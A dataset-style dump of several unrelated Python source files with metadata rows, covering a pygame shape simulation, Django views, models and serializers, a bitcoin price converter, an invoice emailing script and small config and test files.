self.side_length, STROKE_WIDTH)
                else: # draw a polygon centered at self.pos
pygame.draw.polygon(surface, self.color, self.offset_points())
pygame.draw.polygon(surface, BLACK, self.offset_points(),
STROKE_WIDTH)
#else: print("This shape (of type ", self.shape_type, ") is offscreen")
self.update_position()
self.age += 1
if self.age > MAX_AGE:
shapes.remove(self)
shapes.append(generate_shape())
def update_position(self):
if self.shape_type != 'circle':
xdiff = self.nextpos[0] - self.pos[0]
ydiff = self.nextpos[1] - self.pos[1]
for point in self.points:
point[0] += xdiff
point[1] += ydiff
self.pos = (self.nextpos[0], self.nextpos[1])
def offset_points(self):
return [[point[0]+OFFSET[0], point[1]+OFFSET[1]] for point in self.points]
# end class Shape
def bestvote(votes):
maxpos = 0
maxval = votes[0]
for i in range(1, len(votes)):
if votes[i] >= maxval:
maxpos = i
maxval = votes[i]
return maxpos
#xdist = xpos - shape.pos[0]
#ydist = ypos - shape.pos[1]
"""
If xdist is positive, they are to the left of me.
If xdist is negative, they are to the right of me.
If ydist is positive, they are above me.
If ydist is negative, they are below me.
I will reduce the axis of greatest distance if I want to get closer.
I will increase the axis of least distance if I want to get further.
OR
I will randomly choose an axis to travel along.
"""
def closer(xdist, ydist):
if xdist == ydist == 0:
return STAY
if RAND.random() < 0.5:
#if xdist > ydist:
# move along the x axis
if xdist > 0:
return LEFT
else:
return RIGHT
else:
# move along the y axis
if ydist > 0:
return UP
else:
return DOWN
def further(xdist, ydist):
if RAND.random() < 0.5:
#if xdist < ydist:
# move along the x axis
if xdist > 0:
return RIGHT
else:
return LEFT
else:
# move along the y axis
if ydist > 0:
return DOWN
else:
return UP
class Personality(object):
def __init__(self, shape_type):
self.rgb_tolerance = int(RAND.gauss(50, 10))
#self.size_tolerance = int(RAND.gauss(SHAPE_MEAN[shape_type] / 2,
#SHAPE_DEV[shape_type] / 2))
self.personal_space = int(RAND.gauss(SHAPE_MEAN[shape_type] * 2,
SHAPE_DEV[shape_type] / 2))
print self.rgb_tolerance, self.personal_space
# end class Personality
def makepoints(position, shape_type, side_length):
halfside = side_length / 2
if shape_type == 'circle':
return None
elif shape_type == 'triangle':
h = math.sqrt(side_length**2 - (side_length/2)**2)
apothem = h / 2
top = [position[0], position[1] - apothem]
botleft = [position[0] - halfside, position[1] + apothem]
botright = [position[0] + halfside, position[1] + apothem]
return (top, botleft, botright)
elif shape_type == 'square':
topleft = [position[0] - halfside, position[1] - halfside]
topright = [topleft[0] + side_length, topleft[1]]
botleft = [topleft[0], topleft[1] + side_length]
botright = [topright[0], topright[1] + side_length]
return (topleft, topright, botright, botleft)
else:
numsides = SHAPE_SIDES[shape_type]
apothem = side_length / (2 * math.tan(math.pi / numsides))
angle = ((numsides - 2) * math.pi) / (numsides * 2)
xoffset = side_length * math.sin(angle)
yoffset = side_length * math.cos(angle)
radius = math.sqrt(halfside**2 + apothem**2)
if shape_type == 'pentagon':
top = [position[0], position[1] - radius]
second = [position[0] + xoffset, top[1] + yoffset]
third = [position[0] + halfside, position[1] + apothem]
fourth = [position[0] - halfside, position[1] + apothem]
fifth = [position[0] - xoffset, top[1] + yoffset]
return (top, second, third, fourth, fifth)
elif shape_type == 'hexagon':
topleft = [position[0] - halfside, position[1] - apothem]
topright = [position[0] + halfside, position[1] - apothem]
right = [position[0] + radius, position[1]]
botright = [position[0] + halfside, position[1] + apothem]
botleft = [position[0] - halfside, position[1] + apothem]
left = [position[0] - radius, position[1]]
return (topleft, topright, right, botright, botleft, left)
else:
            print('unknown shape, type:', shape_type)
assert False
# end makepoints()
def choose_shape():
for shape_type in SHAPE_TYPES:
print(shape_type)
if shape_type == 'circle':
return shape_type
elif RAND.random() < MAGIC_CONSTANT:
return shape_type
def generate_shape(random_age=False):
if random_age:
age = RAND.randint(0, MAX_AGE-1)
else:
age = 0
r = g = b = 255
while r == 255 and g == 255 and b == 255: # only the player may be white
r = RAND.randint(0,255)
g = RAND.randint(0,255)
b = RAND.randint(0,255)
x = RAND.randint(0,size[0]) - OFFSET[0]
y = RAND.randint(0,size[1]) - OFFSET[1]
shape_type = choose_shape()
shape_size = 0
while shape_size <= 0:
shape_size = RAND.gauss(SHAPE_MEAN[shape_type], SHAPE_DEV[shape_type])
shape = Shape( (x,y), # new shapes always appear onscreen - problem?
shape_type,
int(shape_size),
pygame.color.Color(r, g, b),
Personality(shape_type),
age )
return shape
def generate_shapes():
shapes = []
for i in range(NUM_SHAPES):
shape = generate_shape(True)
shapes.append(shape)
return shapes
size = (1200, 900)
period = 25
player = Shape( (int(size[0]/2), int(size[1]/2)),
'circle',
25,
WHITE,
None,
                0 )  # age must be an int; Shape.draw does self.age += 1 every tick
shapes = generate_shapes()
shapes.append(player)
main(player, shapes, size, period)
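# controls: arrow keys pan the camera (the player, the white circle, stays
# centered because OFFSET moves in the opposite direction); close the window
# to quit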
| 32.494481 | 83 | 0.531793 | 1,748 | 14,720 | 4.382151 | 0.168192 | 0.038773 | 0.020104 | 0.029373 | 0.256527 | 0.18799 | 0.112663 | 0.104047 | 0.079243 | 0.079243 | 0 | 0.027873 | 0.366304 | 14,720 | 452 | 84 | 32.566372 | 0.79331 | 0.127989 | 0 | 0.143345 | 0 | 0 | 0.017799 | 0 | 0 | 0 | 0 | 0 | 0.006826 | 0 | null | null | 0 | 0.006826 | null | null | 0.013652 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6ccc8df451a2936e28cf2b4cd839f862b2e3add8 | 888 | py | Python | predictions/views.py | Mustapha-Belkacim/English-Premier-League-predictor | 2950d70e9aa80cc8c39f102029fb460b992f1e36 | [
"MIT"
] | 5 | 2018-02-27T18:03:45.000Z | 2018-07-23T11:40:55.000Z | predictions/views.py | Mustapha-Belkacim/Russia-2018-World-Cup-Predictor | 2950d70e9aa80cc8c39f102029fb460b992f1e36 | [
"MIT"
] | 1 | 2018-12-10T04:33:24.000Z | 2018-12-10T04:33:24.000Z | predictions/views.py | Mustapha-Belkacim/English-Premier-League-predictor | 2950d70e9aa80cc8c39f102029fb460b992f1e36 | [
"MIT"
] | 1 | 2018-02-26T14:23:40.000Z | 2018-02-26T14:23:40.000Z | from django.shortcuts import render
from django.views import View, generic
from .services.predictor import get_results
class Index(View):
template_name = 'predictions/index.html'
model = 'xgboost'
season = '16/17'
results = ''
leadboard = ''
def get(self, request):
self.results = get_results(self.season)
#self.results = predict_season(self.season, self.model)
return render(request, self.template_name, {'results' :self.results,
'leadboard':self.leadboard})
def post(self, request):
self.model = request.POST['model']
self.season = request.POST['season']
self.results = get_results(self.season)
return render(request, self.template_name, {'results' :self.results,
'leadboard':self.leadboard})
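# Wiring the view into a urlconf, a sketch (the pattern and route name are
# assumptions, not taken from this repo):
#
#   from django.conf.urls import url
#   urlpatterns = [url(r'^$', Index.as_view(), name='index')]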
| 37 | 80 | 0.600225 | 94 | 888 | 5.595745 | 0.319149 | 0.104563 | 0.057034 | 0.079848 | 0.403042 | 0.403042 | 0.285171 | 0.285171 | 0.285171 | 0.285171 | 0 | 0.006339 | 0.289414 | 888 | 23 | 81 | 38.608696 | 0.827258 | 0.060811 | 0 | 0.315789 | 0 | 0 | 0.092437 | 0.026411 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.157895 | 0 | 0.684211 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6ccd22609ab3e08378fdd219fad406bb1e80df1a | 7,546 | py | Python | forex_python/bitcoin.py | Otisey/forex-python | a34d074b8ee7411cd2868ea3945793ef43bf7965 | [
"MIT"
] | 505 | 2016-05-21T04:50:19.000Z | 2022-03-29T04:40:36.000Z | forex_python/bitcoin.py | Otisey/forex-python | a34d074b8ee7411cd2868ea3945793ef43bf7965 | [
"MIT"
] | 92 | 2016-05-22T09:26:23.000Z | 2022-02-18T11:26:56.000Z | forex_python/bitcoin.py | Otisey/forex-python | a34d074b8ee7411cd2868ea3945793ef43bf7965 | [
"MIT"
] | 166 | 2016-05-21T04:52:49.000Z | 2022-03-25T03:57:24.000Z | from decimal import Decimal
import simplejson as json
import requests
from .converter import RatesNotAvailableError, DecimalFloatMismatchError
class BtcConverter(object):
"""
Get bit coin rates and convertion
"""
def __init__(self, force_decimal=False):
self._force_decimal = force_decimal
def _decode_rates(self, response, use_decimal=False):
if self._force_decimal or use_decimal:
decoded_data = json.loads(response.text, use_decimal=True)
else:
decoded_data = response.json()
return decoded_data
def get_latest_price(self, currency):
"""
Get Lates price of one bitcoin to valid Currency 1BTC => X USD
"""
url = 'https://api.coindesk.com/v1/bpi/currentprice/{}.json'.format(currency)
response = requests.get(url)
if response.status_code == 200:
data = response.json()
price = data.get('bpi').get(currency, {}).get('rate_float', None)
if self._force_decimal:
return Decimal(price)
return price
return None
def get_previous_price(self, currency, date_obj):
"""
Get Price for one bit coin on given date
"""
start = date_obj.strftime('%Y-%m-%d')
end = date_obj.strftime('%Y-%m-%d')
url = (
'https://api.coindesk.com/v1/bpi/historical/close.json'
'?start={}&end={}¤cy={}'.format(
start, end, currency
)
)
response = requests.get(url)
if response.status_code == 200:
data = response.json()
price = data.get('bpi', {}).get(start, None)
if self._force_decimal:
return Decimal(price)
return price
raise RatesNotAvailableError("BitCoin Rates Source Not Ready For Given date")
def get_previous_price_list(self, currency, start_date, end_date):
"""
Get List of prices between two dates
"""
start = start_date.strftime('%Y-%m-%d')
end = end_date.strftime('%Y-%m-%d')
url = (
'https://api.coindesk.com/v1/bpi/historical/close.json'
'?start={}&end={}¤cy={}'.format(
start, end, currency
)
)
response = requests.get(url)
if response.status_code == 200:
data = self._decode_rates(response)
price_dict = data.get('bpi', {})
return price_dict
return {}
def convert_to_btc(self, amount, currency):
"""
Convert X amount to Bit Coins
"""
if isinstance(amount, Decimal):
use_decimal = True
else:
use_decimal = self._force_decimal
url = 'https://api.coindesk.com/v1/bpi/currentprice/{}.json'.format(currency)
response = requests.get(url)
if response.status_code == 200:
data = response.json()
price = data.get('bpi').get(currency, {}).get('rate_float', None)
if price:
if use_decimal:
price = Decimal(price)
try:
converted_btc = amount/price
return converted_btc
except TypeError:
raise DecimalFloatMismatchError("convert_to_btc requires amount parameter is of type Decimal when force_decimal=True")
raise RatesNotAvailableError("BitCoin Rates Source Not Ready For Given date")
def convert_btc_to_cur(self, coins, currency):
"""
Convert X bit coins to valid currency amount
"""
if isinstance(coins, Decimal):
use_decimal = True
else:
use_decimal = self._force_decimal
url = 'https://api.coindesk.com/v1/bpi/currentprice/{}.json'.format(currency)
response = requests.get(url)
if response.status_code == 200:
data = response.json()
price = data.get('bpi').get(currency, {}).get('rate_float', None)
if price:
if use_decimal:
price = Decimal(price)
try:
converted_amount = coins * price
return converted_amount
except TypeError:
raise DecimalFloatMismatchError("convert_btc_to_cur requires coins parameter is of type Decimal when force_decimal=True")
raise RatesNotAvailableError("BitCoin Rates Source Not Ready For Given date")
def convert_to_btc_on(self, amount, currency, date_obj):
"""
Convert X amount to BTC based on given date rate
"""
if isinstance(amount, Decimal):
use_decimal = True
else:
use_decimal = self._force_decimal
start = date_obj.strftime('%Y-%m-%d')
end = date_obj.strftime('%Y-%m-%d')
url = (
'https://api.coindesk.com/v1/bpi/historical/close.json'
'?start={}&end={}¤cy={}'.format(
start, end, currency
)
)
response = requests.get(url)
if response.status_code == 200:
data = response.json()
price = data.get('bpi', {}).get(start, None)
if price:
if use_decimal:
price = Decimal(price)
try:
converted_btc = amount/price
return converted_btc
except TypeError:
raise DecimalFloatMismatchError("convert_to_btc_on requires amount parameter is of type Decimal when force_decimal=True")
raise RatesNotAvailableError("BitCoin Rates Source Not Ready For Given Date")
def convert_btc_to_cur_on(self, coins, currency, date_obj):
"""
Convert X BTC to valid currency amount based on given date
"""
if isinstance(coins, Decimal):
use_decimal = True
else:
use_decimal = self._force_decimal
start = date_obj.strftime('%Y-%m-%d')
end = date_obj.strftime('%Y-%m-%d')
url = (
'https://api.coindesk.com/v1/bpi/historical/close.json'
'?start={}&end={}¤cy={}'.format(
start, end, currency
)
)
response = requests.get(url)
if response.status_code == 200:
data = response.json()
price = data.get('bpi', {}).get(start, None)
if price:
if use_decimal:
price = Decimal(price)
try:
converted_btc = coins*price
return converted_btc
except TypeError:
raise DecimalFloatMismatchError("convert_btc_to_cur_on requires amount parameter is of type Decimal when force_decimal=True")
raise RatesNotAvailableError("BitCoin Rates Source Not Ready For Given Date")
def get_symbol(self):
"""
Here is Unicode symbol for bitcoin
"""
return "\u0E3F"
_Btc_Converter = BtcConverter()
get_btc_symbol = _Btc_Converter.get_symbol
convert_btc_to_cur_on = _Btc_Converter.convert_btc_to_cur_on
convert_to_btc_on = _Btc_Converter.convert_to_btc_on
convert_btc_to_cur = _Btc_Converter.convert_btc_to_cur
convert_to_btc = _Btc_Converter.convert_to_btc
get_latest_price = _Btc_Converter.get_latest_price
get_previous_price = _Btc_Converter.get_previous_price
get_previous_price_list = _Btc_Converter.get_previous_price_list
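# Example usage (requires network access to api.coindesk.com; values vary):
#
#   from forex_python.bitcoin import BtcConverter
#   b = BtcConverter()
#   b.get_latest_price('USD')         # price of 1 BTC in USD
#   b.convert_to_btc(400, 'USD')      # 400 USD expressed in BTC
#   b.convert_btc_to_cur(1.5, 'EUR')  # 1.5 BTC expressed in EUR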
| 37.542289 | 145 | 0.579777 | 844 | 7,546 | 4.979858 | 0.126777 | 0.035689 | 0.034261 | 0.020937 | 0.715679 | 0.66976 | 0.656912 | 0.656912 | 0.640733 | 0.622888 | 0 | 0.00607 | 0.323218 | 7,546 | 200 | 146 | 37.73 | 0.816918 | 0.051948 | 0 | 0.666667 | 0 | 0 | 0.168392 | 0.019126 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064103 | false | 0 | 0.025641 | 0 | 0.179487 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6cd509e695712b4d2634df653709f63565e266c1 | 1,895 | py | Python | models.py | Nelestya/blog | 4e99ba3789f5214be5fd290801d0fde751e2d99f | [
"MIT"
] | null | null | null | models.py | Nelestya/blog | 4e99ba3789f5214be5fd290801d0fde751e2d99f | [
"MIT"
] | null | null | null | models.py | Nelestya/blog | 4e99ba3789f5214be5fd290801d0fde751e2d99f | [
"MIT"
] | null | null | null | from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from baseapp.models import Recently
# Create your models here.
class PublishedManager(models.Manager):
def get_queryset(self):
return super(PublishedManager, self).get_queryset().filter(status='published')
class Post(Recently):
STATUS_CHOICE = (
('draft', 'Draft'),
('published', 'Published'),
)
title = models.CharField(max_length=150)
slug = models.SlugField(max_length=150, unique_for_date='publish')
author = models.ForeignKey(User, related_name='blog_posts')
body = models.TextField()
publish = models.DateTimeField(default=timezone.now)
status = models.CharField(max_length=10, choices=STATUS_CHOICE, default='draft')
image = models.ImageField(upload_to='post/%Y/%m/%d', blank=True)
image_description = models.CharField(max_length=60)
objects = models.Manager() # The default manager.
published = PublishedManager() # The Dahl-specific manager.
class Meta:
ordering = ('-publish',)
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('blog:post_detail', args=[self.publish.year,
self.publish.strftime('%m'),
self.publish.strftime('%d'),
self.slug,
])
class Comment(Recently):
mail = models.EmailField()
pseudo = models.CharField(max_length=30)
body = models.TextField()
post = models.ForeignKey('Post',
on_delete=models.CASCADE,
blank=False,
related_name='comments')
def __str__(self):
return 'Commented by {} in {}'.format(self.pseudo, self.post)
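# With the two managers on Post:
#     Post.objects.all()     # default manager: every post, drafts included
#     Post.published.all()   # custom manager: only status='published'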
| 35.092593 | 86 | 0.626913 | 206 | 1,895 | 5.631068 | 0.461165 | 0.038793 | 0.062069 | 0.082759 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008541 | 0.258575 | 1,895 | 53 | 87 | 35.754717 | 0.817082 | 0.037995 | 0 | 0.093023 | 0 | 0 | 0.073117 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.093023 | false | 0 | 0.116279 | 0.093023 | 0.744186 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6cda2551861539e7955fba8e1b052ccf729d24d4 | 3,171 | py | Python | execute.py | ikeban/InvoicesSender | 7eae2b0b201c91f31ee65bf64779a778d98bfa5e | [
"MIT"
] | null | null | null | execute.py | ikeban/InvoicesSender | 7eae2b0b201c91f31ee65bf64779a778d98bfa5e | [
"MIT"
] | null | null | null | execute.py | ikeban/InvoicesSender | 7eae2b0b201c91f31ee65bf64779a778d98bfa5e | [
"MIT"
] | null | null | null | import code.PdfReader as PdfReaderModule
import code.ExcelReader as ExcelReader
import code.TemplateParser as TemplateParser
import code.PdfAnalyzer as PdfAnalyzer
import code.EmailSender as EmailSender
def getFileContent(fileName):
read_data = ""
with open(fileName, encoding="utf-8") as f:
read_data = f.read()
return read_data
def main():
    # TODO: remind the user that [MONTH] should be updated before continuing!
print("If you use [MONTH] in you template, don't forget to update it in InvoiceSenderControl.xlsx")
input("Press Enter to continue... (close window with script to CANCEL)")
print("Parsing excel...")
excelReader = ExcelReader.ExcelReader()
excelContent = excelReader.getData()
excelSmtpData = excelReader.getSmtpData()
print("Parsing pdf...")
pdfReader = PdfReaderModule.PdfReader()
pdfFileNameToItsContentMap = pdfReader.getReadedInvoicesMap()
print("Searching pdfs...")
pdfAnalyzer = PdfAnalyzer.PdfAnalyzer(pdfFileNameToItsContentMap)
emailContentAttachmentList = []
for (invoiceText, emailAddress, templateName, keyWordMap, emailSubject, messageId) in excelContent:
invoicesToAttach = pdfAnalyzer.searchSentenceAndUpdateStats(invoiceText)
if len(invoicesToAttach) == 0:
print("No invoices for: " + emailAddress + " SKIPPING!")
continue
templateContent = getFileContent("emailTemplates/" + templateName)
if templateContent is None or templateContent == "":
print("template not existing or empty for: " + emailAddress + " SKIPPING!")
continue
templateParser = TemplateParser.TemplateParser(templateContent, keyWordMap)
emailFilledTemplate = templateParser.getFilledTemplate()
emailContentAttachmentList.append( (emailAddress, emailSubject, emailFilledTemplate, invoicesToAttach, messageId) )
print("What will be sent:")
for (emailAddress, emailSubject, emailFilledTemplate, invoicesToAttach, messageId) in emailContentAttachmentList:
print("To " + emailAddress + " will be send " + str(invoicesToAttach))
print("Checking if all PDFs can be delivered:")
pdfAnalyzer.dropStatistics()
input("Press Enter to send emails.. (close window with script to CANCEL)")
print("Sending emails...")
(smtpAddress, smtpPort, ownerEmail, ownerPassword) = excelSmtpData
emailSender = EmailSender.EmailSender(smtpAddress, smtpPort, ownerEmail, ownerPassword)
for (emailAddress, emailSubject, emailFilledTemplate, invoicesToAttach, messageId) in emailContentAttachmentList:
        if messageId is None or messageId == "":
emailSender.sendEmail(emailAddress, emailSubject, emailFilledTemplate, invoicesToAttach)
print("Sent an email to " + emailAddress + " with " + str(invoicesToAttach))
else:
emailSender.replayEmail(emailAddress, emailSubject, emailFilledTemplate, invoicesToAttach, messageId)
print("Sent response to " + emailAddress + " with " + str(invoicesToAttach))
emailSender.close()
if __name__ == '__main__':
main()
| 45.3 | 123 | 0.71397 | 285 | 3,171 | 7.905263 | 0.403509 | 0.022193 | 0.095428 | 0.130937 | 0.215712 | 0.182867 | 0.118065 | 0.087883 | 0 | 0 | 0 | 0.000785 | 0.196468 | 3,171 | 69 | 124 | 45.956522 | 0.883438 | 0.027121 | 0 | 0.074074 | 0 | 0.018519 | 0.162828 | 0.008109 | 0 | 0 | 0 | 0.014493 | 0 | 1 | 0.037037 | false | 0.037037 | 0.092593 | 0 | 0.148148 | 0.222222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6ce5b1fdedad3f99e65e3d1f3574b7a7cc248760 | 715 | py | Python | test/serial-gpu.py | ImperialCollegeLondon/software | e8bdb7935817af0fab4ab84b3cdd0509a8f7ccc8 | [
"BSD-3-Clause"
] | 8 | 2019-03-20T02:54:03.000Z | 2021-08-24T15:26:21.000Z | test/serial-gpu.py | ImperialCollegeLondon/software | e8bdb7935817af0fab4ab84b3cdd0509a8f7ccc8 | [
"BSD-3-Clause"
] | 32 | 2019-03-19T23:34:20.000Z | 2022-03-22T19:10:28.000Z | test/serial-gpu.py | ImperialCollegeLondon/software | e8bdb7935817af0fab4ab84b3cdd0509a8f7ccc8 | [
"BSD-3-Clause"
] | 4 | 2019-03-22T18:14:00.000Z | 2021-12-08T14:49:33.000Z | results = open('test-results-gpu.out', 'a')
results.write('** Starting serial GPU tests **\n')
try:
# Fresnel
#import fresnel
#results.write('Fresnel version : {}\n'.format(fresnel.__version__))
#dev = fresnel.Device(mode='gpu', n=1)
#results.write('Fresnel device : {}\n'.format(dev))
# HOOMD
import hoomd
context = hoomd.context.initialize('--mode=gpu')
assert(context.on_gpu())
results.write('HOOMD version : {}\n'.format(hoomd.__version__))
results.write('HOOMD flags : {}\n'.format(hoomd._hoomd.hoomd_compile_flags()))
results.write('** Serial GPU tests PASSED **\n\n')
except:
results.write('** Serial GPU tests FAILED **\n\n')
raise
| 31.086957 | 88 | 0.634965 | 90 | 715 | 4.911111 | 0.344444 | 0.190045 | 0.095023 | 0.095023 | 0.117647 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001715 | 0.184615 | 715 | 22 | 89 | 32.5 | 0.756432 | 0.26014 | 0 | 0 | 0 | 0 | 0.341651 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 1 | 0 | false | 0.083333 | 0.083333 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
6ce92f7cc60e57aeb3a0f765328c9efb31ca244a | 626 | py | Python | .configs/sonatconfig.py | Armcollector/lockdown-workout | a1c4633c8bd47e399bc7297d77f980542885414e | [
"MIT"
] | null | null | null | .configs/sonatconfig.py | Armcollector/lockdown-workout | a1c4633c8bd47e399bc7297d77f980542885414e | [
"MIT"
] | null | null | null | .configs/sonatconfig.py | Armcollector/lockdown-workout | a1c4633c8bd47e399bc7297d77f980542885414e | [
"MIT"
] | null | null | null | import os
import urllib.parse
basedir = os.path.abspath(os.path.dirname(__file__))
if "DB_CONNECTIONSTRING" in os.environ:
params = urllib.parse.quote_plus(os.environ.get("DB_CONNECTIONSTRING"))
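# note: when DB_CONNECTIONSTRING is unset, 'params' is never defined and the
# Config class body below raises a NameError as soon as this module is imported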
class Config(object):
SECRET_KEY = os.environ.get("SECRET_KEY") or "iR33OXoRSUj5"
SQLALCHEMY_DATABASE_URI = "mssql+pyodbc:///?odbc_connect={}".format(params)
SQLALCHEMY_TRACK_MODIFICATIONS = False
SQLALCHEMY_COMMIT_ON_TEARDOWN = True
VERSION = "2.1.0"
WTF_CSR_ENABLED = True
CACHE_TYPE = "simple"
CACHE_DEFAULT_TIMEOUT = 50
MAINTITLE = "Sonats Lockdown Workout "
INSTANCE = "SONAT"
| 28.454545 | 79 | 0.728435 | 80 | 626 | 5.425 | 0.7375 | 0.062212 | 0.0553 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015209 | 0.159744 | 626 | 21 | 80 | 29.809524 | 0.809886 | 0 | 0 | 0 | 0 | 0 | 0.210863 | 0.051118 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.8125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6ceec6d6259423de30eaf0244fd138f63c906931 | 4,710 | py | Python | saleor/api/purchase/serializers.py | glosoftgroup/glosoftgroup-django-pos | b489c402939b9ebabd164c449e7da38fe849d550 | [
"BSD-3-Clause"
] | 2 | 2017-07-11T12:40:59.000Z | 2017-10-18T18:02:46.000Z | saleor/api/purchase/serializers.py | glosoftgroup/glosoftgroup-django-pos | b489c402939b9ebabd164c449e7da38fe849d550 | [
"BSD-3-Clause"
] | 12 | 2017-06-19T07:20:41.000Z | 2022-03-15T19:03:33.000Z | saleor/api/purchase/serializers.py | glosoftgroup/glosoftgroup-django-pos | b489c402939b9ebabd164c449e7da38fe849d550 | [
"BSD-3-Clause"
] | null | null | null | from django.utils.formats import localize
from rest_framework.serializers import (
ModelSerializer,
HyperlinkedIdentityField,
SerializerMethodField,
ValidationError,
)
from rest_framework import serializers
from django.contrib.auth import get_user_model
from ...purchase.models import PurchaseProduct as Table
from saleor.payment.models import PaymentOption
from structlog import get_logger
logger = get_logger(__name__)
User = get_user_model()
class TableListSerializer(serializers.ModelSerializer):
unit_cost = SerializerMethodField()
total_cost = SerializerMethodField()
paid = SerializerMethodField()
supplier_name = SerializerMethodField()
product_name = SerializerMethodField()
pay_option = SerializerMethodField()
date = SerializerMethodField()
credit_balance = SerializerMethodField()
class Meta:
model = Table
fields = (
'id',
'invoice_number',
'product_name',
'variant',
'quantity',
'unit_cost',
'total_cost',
'paid',
'credit_balance',
'supplier_name',
'pay_option',
'date',
)
def get_pay_option(self, obj):
try:
options = obj.payment_options.first().name
except Exception as e:
print(e)
options = ''
try:
return options + '<br> ' + obj.payment_number
except:
return ''
def get_credit_balance(self, obj):
try:
return "{:,}".format(obj.balance.gross)
except Exception as e:
print(e)
return ''
def get_paid(self, obj):
try:
return "{:,}".format(obj.amount_paid.gross)
except Exception as e:
print(e)
return ''
def get_product_name(self, obj):
try:
return obj.stock.variant.display_product()
except:
return ''
def get_supplier_name(self, obj):
try:
return obj.supplier.name
except:
return ''
def get_date(self, obj):
return localize(obj.created)
def get_unit_cost(self, obj):
try:
return obj.cost_price.gross
except Exception as e:
return 0
def get_total_cost(self, obj):
try:
return obj.total_cost.gross
except Exception as e:
return 0
class DistinctTableListSerializer(serializers.ModelSerializer):
purchase_url = HyperlinkedIdentityField(view_name='dashboard:sale_supplier_list')
unit_cost = SerializerMethodField()
total_cost = SerializerMethodField()
total_quantity = SerializerMethodField()
supplier_name = SerializerMethodField()
product_name = SerializerMethodField()
date = SerializerMethodField()
class Meta:
model = Table
fields = (
'id',
'invoice_number',
'product_name',
'variant',
'quantity',
'unit_cost',
'total_cost',
'total_quantity',
'supplier_name',
'date',
'purchase_url'
)
def get_product_name(self, obj):
return obj.stock.variant.display_product()
def get_date(self, obj):
return localize(obj.created)
def get_supplier_name(self, obj):
try:
return obj.supplier.name
except:
return ''
def get_unit_cost(self, obj):
try:
return obj.cost_price.gross
except Exception as e:
return 0
def get_total_quantity(self, obj):
try:
return Table.objects.total_quantity(obj)
except:
return 0
def get_total_cost(self, obj):
try:
return Table.objects.total_cost(obj)
except:
return 0
class PaymentOptionListSerializer(serializers.ModelSerializer):
tendered = SerializerMethodField()
transaction_number = SerializerMethodField()
payment_name = SerializerMethodField()
class Meta:
model = PaymentOption
fields = (
'id',
'name',
'transaction_number',
'payment_name',
'tendered'
)
def get_transaction_number(self, obj):
return ''
def get_tendered(self, obj):
return 0.00
def get_payment_name(self, obj):
try:
return obj.name
except:
return ''
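# Typical use from a DRF view (a sketch; the queryset is an assumption):
#
#   serializer = TableListSerializer(Table.objects.all(), many=True)
#   serializer.data  # list of dicts with formatted costs, supplier names, dates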
| 25.597826 | 85 | 0.562208 | 432 | 4,710 | 5.93287 | 0.185185 | 0.039797 | 0.04682 | 0.06867 | 0.508389 | 0.508389 | 0.378463 | 0.28014 | 0.28014 | 0.28014 | 0 | 0.002642 | 0.357113 | 4,710 | 183 | 86 | 25.737705 | 0.843791 | 0 | 0 | 0.638158 | 0 | 0 | 0.063057 | 0.005945 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111842 | false | 0 | 0.046053 | 0.032895 | 0.506579 | 0.019737 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
